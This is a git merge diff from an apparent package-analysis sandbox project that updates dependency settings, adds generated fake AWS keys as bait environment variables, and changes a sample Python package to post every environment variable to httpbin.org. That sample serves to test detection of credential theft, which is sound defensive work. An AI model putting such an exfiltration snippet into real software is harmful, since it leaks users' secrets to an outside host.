Merge branch 'main' into python_async_code_execution

.github/dependabot.yml

@@ -33,3 +33,8 @@ updates:
   directory: "/internal/staticanalysis/parsing"
   schedule:
     interval: "weekly"
+  groups:
+    parsing-minor-updates:
+      update-types:
+        - "minor"
+        - "patch"

.github/workflows/depsreview.yml

@@ -15,4 +15,4 @@ jobs:
       - name: 'Checkout Repository'
         uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1
       - name: 'Dependency Review'
-        uses: actions/dependency-review-action@9f45b2463b475767b61721ccfef113fef513e6aa # v3.1.1
+        uses: actions/dependency-review-action@7bbfa034e752445ea40215fff1c3bf9597993d3f # v3.1.3

internal/staticanalysis/parsing/package.json

@@ -4,6 +4,6 @@
   "type": "module",
   "dependencies": {
     "@babel/parser": "^7.23.0",
-    "@babel/traverse": "^7.23.2"
+    "@babel/traverse": "^7.23.3"
   }
 }

internal/worker/rundynamic.go

@@ -4,10 +4,12 @@ import (
 	"context"
 	"crypto/rand"
 	"crypto/rsa"
+	"encoding/base64"
 	"encoding/pem"
 	"fmt"
 	"io"
 	"log/slog"
+	mathrand "math/rand"
 	"os"
 	"path/filepath"
 	"runtime"
@@ -108,6 +110,24 @@ func addSSHKeysToSandbox(ctx context.Context, sb sandbox.Sandbox) error {
 	return sb.CopyIntoSandbox(ctx, tempdir+"/.", "/root/.ssh")
 }
 
+// generateAWSKeys returns two strings. The first is an AWS access key id based
+// off of some known patterns and pseudorandom values. The second is a random 30
+// byte base64 encoded string to use as an AWS secret access key.
+func generateAWSKeys() (string, string) {
+	const charSet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567"
+	var accessKeyId = "AKIAI"
+	src := mathrand.NewSource(time.Now().UnixNano())
+	r := mathrand.New(src)
+	for i := 0; i < 14; i++ {
+		randIndex := r.Intn(len(charSet))
+		accessKeyId += string(charSet[randIndex])
+	}
+	accessKeyId += "Q"
+	b := make([]byte, 30)
+	r.Read(b)
+	return accessKeyId, base64.StdEncoding.EncodeToString(b)
+}
+
 /*
 RunDynamicAnalysis runs dynamic analysis on the given package across the phases
 valid in the package ecosystem (e.g. import, install), in a sandbox created
@@ -137,6 +157,14 @@ func RunDynamicAnalysis(ctx context.Context, pkg *pkgmanager.Pkg, sbOpts []sandb
 		analysisCmd = dynamicanalysis.DefaultCommand(pkg.Ecosystem())
 	}
 
+	// Adding environment variable baits. We use mocked AWS keys since they are
+	// commonly added as environment variables and will be easy to query for in
+	// the analysis results. See AWS docs on environment variable configuration:
+	// https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-envvars.html
+	AWSAccessKeyId, AWSSecretAccessKey := generateAWSKeys()
+	sbOpts = append(sbOpts, sandbox.SetEnv("AWS_ACCESS_KEY_ID", AWSAccessKeyId))
+	sbOpts = append(sbOpts, sandbox.SetEnv("AWS_SECRET_ACCESS_KEY", AWSSecretAccessKey))
+
 	sb := sandbox.New(sbOpts...)
 
 	defer func() {

sample_packages/sample_python_package/src/example.py

@@ -3,10 +3,11 @@
 import os
 
 # Sends an HTTPS post request and prints out the response.
+# Exfiltrates environment variables.
 def send_https_post_request(called_from: str, print_logs: bool) -> None:
   host = "www.httpbin.org"
   conn = http.client.HTTPSConnection(host)
-  data = {'text': 'Sending data through HTTPS from: ' + called_from}
+  data = {"text": f"Sending data through HTTPS from: {called_from}. Found environment variables: {str(os.environ)}"}
   json_data = json.dumps(data)
   conn.request("POST", "/post", json_data, headers={"Host": host})
   response = conn.getresponse()